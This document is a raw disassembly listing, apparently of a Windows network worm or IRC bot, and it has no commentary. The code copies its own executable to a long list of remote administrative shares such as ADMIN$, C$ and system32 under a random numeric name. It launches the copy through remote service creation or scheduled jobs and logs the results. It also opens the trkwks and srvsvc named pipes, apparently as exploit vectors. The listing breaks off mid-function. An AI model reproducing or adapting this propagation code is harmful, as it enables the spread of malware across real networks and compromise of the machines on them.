push esi
push esi
push ebx
call dword_456DD0 ; StartServiceA
test eax, eax
jz short loc_4052F5
push 1F4h
call dword_437190 ; Sleep
push ebx
call dword_456E50 ; DeleteService
push [ebp+var_4]
call dword_456DE4 ; CloseServiceHandle
push ebx
loc_4052EA: ; CODE XREF: sub_4051EF+14D�j
call dword_456DE4 ; CloseServiceHandle
xor eax, eax
inc eax
jmp short loc_405357
; ---------------------------------------------------------------------------
loc_4052F5: ; CODE XREF: sub_4051EF+DD�j
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 41Dh
jnz short loc_40533E
push edi
push offset dword_4439CC
push [ebp+var_4]
call dword_456DC8 ; OpenServiceA
mov edi, eax
cmp edi, esi
jz short loc_40533E
push esi
push esi
push edi
call dword_456DD0 ; StartServiceA
test eax, eax
jz short loc_40533E
push ebx
call dword_456E50 ; DeleteService
push [ebp+var_4]
call dword_456DE4 ; CloseServiceHandle
push ebx
call dword_456DE4 ; CloseServiceHandle
push edi
jmp short loc_4052EA
; ---------------------------------------------------------------------------
loc_40533E: ; CODE XREF: sub_4051EF+111�j
; sub_4051EF+126�j ...
push ebx
call dword_456E50 ; DeleteService
push [ebp+var_4]
call dword_456DE4 ; CloseServiceHandle
push ebx
loc_40534F: ; CODE XREF: sub_4051EF+CD�j
call dword_456DE4 ; CloseServiceHandle
loc_405355: ; CODE XREF: sub_4051EF+26�j
xor eax, eax
loc_405357: ; CODE XREF: sub_4051EF+104�j
pop edi
pop esi
pop ebx
leave
retn
sub_4051EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40535C proc near ; CODE XREF: sub_40541D+4EC�p
var_3AC = byte ptr -3ACh
var_1A4 = byte ptr -1A4h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3ACh
push ebx
push edi
lea eax, [ebp+var_1A4]
push 190h
mov edi, dword_437184
push eax
push 0FFFFFFFFh
xor ebx, ebx
push [ebp+arg_0]
mov [ebp+var_4], ebx
push ebx
push ebx
call edi ; dword_437184
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1A4]
push eax
call dword_456E2C
test eax, eax
jnz short loc_40540E
mov ecx, [ebp+var_4]
cmp ecx, ebx
jz short loc_40540E
mov eax, [ecx]
push esi
push 3Ch
xor edx, edx
pop esi
div esi
xor edx, edx
push 10h
push ebx
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
lea eax, [ebp+var_14]
push eax
mov esi, edx
call sub_429760
imul esi, 0EA60h
add esp, 0Ch
lea eax, [ebp+var_3AC]
mov [ebp+var_14], esi
push 208h
push eax
push 0FFFFFFFFh
push [ebp+arg_4]
push ebx
push ebx
call edi ; dword_437184
lea eax, [ebp+var_3AC]
mov [ebp+var_8], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1A4]
push eax
call dword_456E84
test eax, eax
pop esi
jnz short loc_40540E
inc ebx
loc_40540E: ; CODE XREF: sub_40535C+3E�j
; sub_40535C+45�j ...
push [ebp+var_4]
call dword_456FE0
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40535C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40541D proc near ; CODE XREF: sub_405965+34�p
var_514 = byte ptr -514h
var_410 = byte ptr -410h
var_30C = byte ptr -30Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_104 = dword ptr -104h
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_C0 = dword ptr 0C8h
arg_C8 = dword ptr 0D0h
arg_D0 = dword ptr 0D8h
push ebp
mov ebp, esp
sub esp, 514h
push ebx
push esi
push edi
call sub_428017
xor edi, edi
push 20h
lea eax, [ebp+var_108]
push edi
push eax
call sub_429760
mov eax, [ebp+arg_8]
add esp, 0Ch
mov [ebp+var_F4], eax
lea eax, [ebp+var_108]
push edi
mov [ebp+var_104], 1
push [ebp+arg_0]
mov [ebp+var_F8], edi
mov [ebp+var_EC], edi
push [ebp+arg_4]
push eax
call dword_457000
test eax, eax
jnz loc_405951
push [ebp+arg_0]
mov esi, 104h
lea eax, [ebp+var_514]
push offset aAdministratorS ; "Administrator\\\\%s$"
push esi
push eax
call sub_429BBE
lea eax, [ebp+var_514]
add esp, 10h
mov [ebp+var_D0], eax
mov eax, offset aCWindowsSystem ; "C:\\WINDOWS\\system32$"
mov [ebp+var_E8], offset byte_454A54
mov [ebp+var_E4], offset aAdmin_2 ; "ADMIN$"
mov [ebp+var_E0], offset aIpc ; "IPC$"
mov [ebp+var_DC], offset aPrint ; "PRINT$"
mov [ebp+var_D8], offset aS_7 ; "S$"
mov [ebp+var_D4], offset aNetlogon ; "NETLOGON$"
mov [ebp+var_CC], offset aB ; "B$"
mov [ebp+var_C8], offset aC_0 ; "C$"
mov [ebp+var_C4], offset aD ; "D$"
mov [ebp+var_C0], offset aE_1 ; "E$"
mov [ebp+var_BC], offset aF ; "F$"
mov [ebp+var_B8], offset aG ; "G$"
mov [ebp+var_B4], offset asc_43E014 ; "H$"
mov [ebp+var_B0], offset aI_1 ; "I$"
mov [ebp+var_AC], offset aJ ; "J$"
mov [ebp+var_A8], offset aK_0 ; "K$"
mov [ebp+var_A4], offset asc_43E004 ; "L$"
mov [ebp+var_A0], offset aM_3 ; "M$"
mov [ebp+var_9C], offset aN_0 ; "N$"
mov [ebp+var_98], offset aO ; "O$"
mov [ebp+var_94], offset aP_3 ; "P$"
mov [ebp+var_90], offset aQ_0 ; "Q$"
mov [ebp+var_8C], offset aR ; "R$"
mov [ebp+var_88], offset aT ; "T$"
mov [ebp+var_84], offset aU_0 ; "U$"
mov [ebp+var_80], offset aV ; "V$"
mov [ebp+var_7C], offset aW ; "W$"
mov [ebp+var_78], offset asc_43DFDC ; "X$"
mov [ebp+var_74], offset aY_0 ; "Y$"
mov [ebp+var_70], offset aZ_1 ; "Z$"
mov [ebp+var_6C], eax
mov [ebp+var_68], offset aCWinnt ; "C:\\WINNT$"
mov [ebp+var_64], offset aDWindows ; "D:\\WINDOWS$"
mov [ebp+var_60], offset aCWinntSystem32 ; "C:\\WINNT\\system32$"
mov [ebp+var_5C], eax
mov [ebp+var_58], offset aDWinntSystem32 ; "D:\\WINNT\\system32$"
mov [ebp+var_54], offset aDWindowsSystem ; "D:\\WINDOWS\\system32$"
mov [ebp+var_50], offset aEWinntSystem32 ; "E:\\WINNT\\system32$"
mov [ebp+var_4C], offset aEWindowsSystem ; "E:\\WINDOWS\\system32$"
mov [ebp+var_48], offset aCDocume1Admini ; "C$\\DOCUME~1\\ADMINI~1\\"
mov [ebp+var_44], offset aDDocume1Admini ; "D$\\DOCUME~1\\ADMINI~1\\"
mov [ebp+var_40], offset aCDocume1Admi_0 ; "C$\\DOCUME~1\\ADMINI~1$"
mov [ebp+var_3C], offset aDDocume1Admi_0 ; "D$\\DOCUME~1\\ADMINI~1$"
mov [ebp+var_38], offset aAdministrado_1 ; "ADMINISTRADOR$"
mov [ebp+var_34], offset aAdministrato_1 ; "ADMINISTRATOR$"
mov [ebp+var_30], offset aPipe_0 ; "PIPE\\"
mov [ebp+var_2C], offset aPipe ; "PIPE$"
mov [ebp+var_28], offset aWindows_0 ; "WINDOWS$"
mov [ebp+var_24], offset aWinnt_0 ; "WINNT$"
mov [ebp+var_20], offset aMysql_0 ; "MYSQL$"
mov [ebp+var_1C], offset aMssql_0 ; "MSSQL$"
mov [ebp+var_18], offset aDrivec ; "drivec$"
mov [ebp+var_14], offset aBrowser ; "BROWSER$"
mov [ebp+var_10], offset aDevice0 ; "device0$"
mov [ebp+var_C], edi
call sub_429B9C
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
mov ebx, offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
idiv ecx
lea eax, [ebp+var_30C]
push edx
push offset dword_4439B4
push ebx
push eax
call sub_429B03
add esp, 20h
lea eax, [ebp+var_410]
push esi
push eax
push 0
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
and [ebp+var_4], 0
mov esi, offset aSSS_4 ; "%s\\%s\\%s"
loc_4056DF: ; CODE XREF: sub_40541D+3E4�j
mov eax, [ebp+var_4]
lea ecx, [ebp+var_30C]
push ecx
mov eax, [ebp+eax*4+var_E8]
push eax
lea eax, [ebp+var_20C]
push [ebp+arg_8]
push esi
push eax
call sub_429B03
add esp, 14h
lea eax, [ebp+var_20C]
push eax
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_405728
lea eax, [ebp+var_20C]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
loc_405728: ; CODE XREF: sub_40541D+2F7�j
lea eax, [ebp+var_20C]
push 0
push eax
lea eax, [ebp+var_410]
push eax
call dword_437064 ; CopyFileA
test eax, eax
mov [ebp+var_8], eax
jnz loc_405811
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 5
jnz loc_4057FA
lea eax, [ebp+var_20C]
push 0
push eax
call sub_42A6C0
pop ecx
test eax, eax
pop ecx
jnz loc_4057FA
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
lea eax, [ebp+var_30C]
push edx
push offset dword_4439B4
push ebx
push eax
call sub_429B03
lea eax, [ebp+var_30C]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_E8]
lea eax, [ebp+var_20C]
push [ebp+arg_8]
push esi
push eax
call sub_429B03
add esp, 34h
lea eax, [ebp+var_20C]
push 0
push eax
lea eax, [ebp+var_410]
push eax
call dword_437064 ; CopyFileA
test eax, eax
mov [ebp+var_8], eax
jnz short loc_405811
loc_4057FA: ; CODE XREF: sub_40541D+335�j
; sub_40541D+34D�j
inc [ebp+var_4]
cmp [ebp+var_4], 38h
jb loc_4056DF
cmp [ebp+var_8], 0
jz loc_40594F
loc_405811: ; CODE XREF: sub_40541D+326�j
; sub_40541D+3DB�j
mov eax, [ebp+var_4]
lea ecx, [ebp+var_30C]
push ecx
push [ebp+arg_4]
mov eax, [ebp+eax*4+var_E8]
mov [ebp+var_4], eax
push [ebp+arg_0]
push [ebp+arg_8]
push eax
call sub_4051EF
add esp, 14h
test eax, eax
jz loc_4058FF
mov ebx, offset aSSSSSSCreateds ; "%s %s: -> [%s\\%s, %s/%s] (CreatedServic"...
loc_405844: ; CODE XREF: sub_40541D+4FC�j
cmp [ebp+arg_D0], 0
mov edi, offset dword_43A357
mov esi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
jz short loc_4058A0
cmp [ebp+arg_C8], 0
jnz short loc_4058A9
push offset byte_454A54
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
mov eax, offset aBlank ; "(Blank)"
jz short loc_40587A
mov eax, [ebp+arg_4]
loc_40587A: ; CODE XREF: sub_40541D+458�j
push eax
mov eax, [ebp+arg_C0]
push [ebp+arg_0]
shl eax, 6
push [ebp+var_4]
add eax, edi
push [ebp+arg_8]
push eax
push esi
push ebx
push [ebp+arg_C]
push [ebp+arg_10]
call sub_41CE4A
add esp, 24h
loc_4058A0: ; CODE XREF: sub_40541D+438�j
cmp [ebp+arg_C8], 0
jz short loc_4058E9
loc_4058A9: ; CODE XREF: sub_40541D+441�j
push offset byte_454A54
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
mov eax, offset aBlank ; "(Blank)"
jz short loc_4058C3
mov eax, [ebp+arg_4]
loc_4058C3: ; CODE XREF: sub_40541D+4A1�j
push eax
mov eax, [ebp+arg_C0]
push [ebp+arg_0]
shl eax, 6
push [ebp+var_4]
add eax, edi
push [ebp+arg_8]
push eax
push esi
push ebx
push [ebp+arg_C]
push [ebp+arg_10]
call sub_41CDD4
add esp, 24h
loc_4058E9: ; CODE XREF: sub_40541D+48A�j
mov eax, [ebp+arg_C0]
xor edi, edi
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
inc edi
jmp short loc_405951
; ---------------------------------------------------------------------------
loc_4058FF: ; CODE XREF: sub_40541D+41C�j
lea eax, [ebp+var_30C]
push eax
push [ebp+arg_8]
call sub_40535C
pop ecx
test eax, eax
pop ecx
jz short loc_40591E
mov ebx, offset aSSSSSSNetsched ; "%s %s: -> [%s\\%s, %s/%s] (NetSchedJobAd"...
jmp loc_405844
; ---------------------------------------------------------------------------
loc_40591E: ; CODE XREF: sub_40541D+4F5�j
lea eax, [ebp+var_20C]
push eax
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_405942
lea eax, [ebp+var_20C]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
loc_405942: ; CODE XREF: sub_40541D+511�j
lea eax, [ebp+var_20C]
push eax
call dword_437060 ; DeleteFileA
loc_40594F: ; CODE XREF: sub_40541D+3EE�j
xor edi, edi
loc_405951: ; CODE XREF: sub_40541D+5A�j
; sub_40541D+4E0�j
push 1
push 1
push [ebp+arg_8]
call dword_456FB0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40541D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405965 proc near ; CODE XREF: sub_4059BF+137�p
; sub_4059BF+1B4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
cmp off_43CE08, 0
push ebx
push esi
push edi
jz short loc_4059B3
mov eax, offset off_43CE08
mov ebx, eax
loc_40597B: ; CODE XREF: sub_405965+4C�j
sub esp, 0C4h
lea esi, [ebp+arg_10]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_C]
rep movsd
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
push [ebp+arg_0]
call sub_40541D
add esp, 0D8h
cmp eax, 1
jz short loc_4059BA
add ebx, 4
mov eax, ebx
cmp dword ptr [ebx], 0
jnz short loc_40597B
loc_4059B3: ; CODE XREF: sub_405965+D�j
xor eax, eax
loc_4059B5: ; CODE XREF: sub_405965+58�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4059BA: ; CODE XREF: sub_405965+42�j
xor eax, eax
inc eax
jmp short loc_4059B5
sub_405965 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059BF proc near ; CODE XREF: sub_406D7F+366�p
var_62C = byte ptr -62Ch
var_244 = byte ptr -244h
var_118 = byte ptr -118h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
lea eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_30]
xor ebx, ebx
push offset aS_0 ; "\\\\%s"
push eax
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_18], ebx
call sub_429B03
add esp, 0Ch
lea eax, [ebp+var_62C]
push 3E8h
push eax
lea eax, [ebp+var_30]
push 0FFFFFFFFh
push eax
push ebx
push ebx
call dword_437184 ; MultiByteToWideChar
lea eax, [ebp+var_30]
mov [ebp+var_40], ebx
push eax
lea eax, [ebp+var_118]
push offset aSIpc ; "%s\\IPC$"
push eax
mov [ebp+var_34], ebx
mov [ebp+var_4C], ebx
call sub_429B03
lea eax, [ebp+var_118]
add esp, 0Ch
mov [ebp+var_3C], eax
mov eax, offset byte_454A54
push ebx
push eax
push eax
lea eax, [ebp+var_50]
push eax
call dword_457000
test eax, eax
jz short loc_405A5F
push 1
lea eax, [ebp+var_118]
push ebx
push eax
call dword_456FB0
xor eax, eax
jmp loc_405B93
; ---------------------------------------------------------------------------
loc_405A5F: ; CODE XREF: sub_4059BF+87�j
; sub_4059BF+16E�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
lea eax, [ebp+var_62C]
push ebx
push eax
call dword_456E60
mov [ebp+var_C], eax
push 1
lea eax, [ebp+var_118]
push ebx
push eax
call dword_456FB0
cmp [ebp+var_C], ebx
jz short loc_405AA2
cmp [ebp+var_C], 0EAh
jnz short loc_405B15
loc_405AA2: ; CODE XREF: sub_4059BF+D8�j
mov eax, [ebp+var_4]
cmp eax, ebx
mov [ebp+var_10], eax
jz short loc_405B26
cmp [ebp+var_14], ebx
mov [ebp+var_8], ebx
jbe short loc_405B15
loc_405AB4: ; CODE XREF: sub_4059BF+154�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_405B15
push ebx
push ebx
lea ecx, [ebp+var_244]
push 12Ch
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call dword_437074 ; WideCharToMultiByte
sub esp, 0C4h
lea eax, [ebp+var_30]
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_4]
rep movsd
push [ebp+arg_0]
push eax
lea eax, [ebp+var_244]
push eax
call sub_405965
add esp, 0D4h
cmp eax, 1
jz short loc_405B15
add [ebp+var_10], 4
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jb short loc_405AB4
loc_405B15: ; CODE XREF: sub_4059BF+E1�j
; sub_4059BF+F3�j ...
cmp [ebp+var_4], ebx
jz short loc_405B26
push [ebp+var_4]
call dword_456FE0
mov [ebp+var_4], ebx
loc_405B26: ; CODE XREF: sub_4059BF+EB�j
; sub_4059BF+159�j
cmp [ebp+var_C], 0EAh
jz loc_405A5F
cmp [ebp+var_4], ebx
jz short loc_405B41
push [ebp+var_4]
call dword_456FE0
loc_405B41: ; CODE XREF: sub_4059BF+177�j
cmp [ebp+var_C], 5
jnz short loc_405B90
cmp off_43CBE8, ebx
jz short loc_405B90
mov eax, offset off_43CBE8
mov [ebp+var_8], eax
loc_405B57: ; CODE XREF: sub_4059BF+1CF�j
sub esp, 0C4h
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_4]
rep movsd
push [ebp+arg_0]
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax]
call sub_405965
add esp, 0D4h
cmp eax, 1
jz short loc_405B90
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
cmp [eax], ebx
jnz short loc_405B57
loc_405B90: ; CODE XREF: sub_4059BF+186�j
; sub_4059BF+18E�j ...
xor eax, eax
inc eax
loc_405B93: ; CODE XREF: sub_4059BF+9B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4059BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405B98 proc near ; DATA XREF: .text:0043A004�o
jmp $+5
sub_405B98 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405B9D proc near
mov eax, dword_43E0C8
add eax, 6
mov dword_455394, eax
retn
sub_405B9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BAB proc near ; CODE XREF: sub_405BAB+D0�p
; sub_405C99+5E4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_405BBF
or [ebp+arg_7], 1
jmp short loc_405BC3
; ---------------------------------------------------------------------------
loc_405BBF: ; CODE XREF: sub_405BAB+C�j
and [ebp+arg_7], 0FEh
loc_405BC3: ; CODE XREF: sub_405BAB+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_405BE7
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_405BF9
; ---------------------------------------------------------------------------
loc_405BE7: ; CODE XREF: sub_405BAB+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_405BF9: ; CODE XREF: sub_405BAB+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_4297B8
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_405C92
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_429420
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_437078 ; WriteFile
test eax, eax
jz short loc_405C89
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_405C89
push [ebp+arg_20]
call sub_4298F2
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_405C85
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_405BAB
add esp, 2Ch
jmp short loc_405C94
; ---------------------------------------------------------------------------
loc_405C85: ; CODE XREF: sub_405BAB+B3�j
mov al, 1
jmp short loc_405C94
; ---------------------------------------------------------------------------
loc_405C89: ; CODE XREF: sub_405BAB+9C�j
; sub_405BAB+A4�j
push [ebp+arg_20]
call sub_4298F2
pop ecx
loc_405C92: ; CODE XREF: sub_405BAB+61�j
xor al, al
loc_405C94: ; CODE XREF: sub_405BAB+D8�j
; sub_405BAB+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_405BAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C99 proc near ; CODE XREF: sub_4063C0+4F�p
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
var_20DC = byte ptr -20DCh
var_DC = byte ptr -0DCh
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_D4 = dword ptr -0D4h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = dword ptr -0CCh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = word ptr -0BCh
var_BA = byte ptr -0BAh
var_B8 = byte ptr -0B8h
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = qword ptr -68h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = qword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
mov eax, 60DCh
call sub_429B60
mov eax, [ebp+arg_CC]
push ebx
push esi
xor ebx, ebx
lea esi, [eax+eax*4]
push edi
shl esi, 2
cmp byte_43E0B0[esi], bl
jz loc_405E05
lea eax, [ebp+arg_8]
push offset dword_43AB8C
push eax
call sub_42A8C0
pop ecx
mov edi, 2000h
test eax, eax
pop ecx
jz short loc_405D21
lea eax, [ebp+arg_8]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+var_20DC]
push edi
push eax
call sub_429BBE
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_454A54
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call sub_4290C4
loc_405D21: ; CODE XREF: sub_405C99+41�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeTrkwks ; "\\\\%s\\pipe\\trkwks"
lea eax, [ebp+var_40DC]
push edi
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_CC], eax
jnz loc_405E0A
lea eax, [ebp+arg_8]
push offset dword_43AB8C
push eax
call sub_42A8C0
pop ecx
test eax, eax
pop ecx
jz short loc_405DBF
lea eax, [ebp+arg_8]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+var_20DC]
push edi
push eax
call sub_429BBE
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_454A54
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call sub_4290C4
loc_405DBF: ; CODE XREF: sub_405C99+DF�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeSrvsvc ; "\\\\%s\\pipe\\srvsvc"
lea eax, [ebp+var_40DC]
push edi
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_CC], eax
jnz short loc_405E0A
jmp loc_4063B9
; ---------------------------------------------------------------------------
loc_405E05: ; CODE XREF: sub_405C99+24�j
mov edi, 2000h
loc_405E0A: ; CODE XREF: sub_405C99+C7�j
; sub_405C99+165�j
cmp byte_43E0B1[esi], bl
jz loc_405EB4
lea eax, [ebp+arg_8]
push offset dword_43AB8C
push eax
call sub_42A8C0
pop ecx
test eax, eax
pop ecx
jz short loc_405E6F
lea eax, [ebp+arg_8]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+var_20DC]
push edi
push eax
call sub_429BBE
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_454A54
push ebx
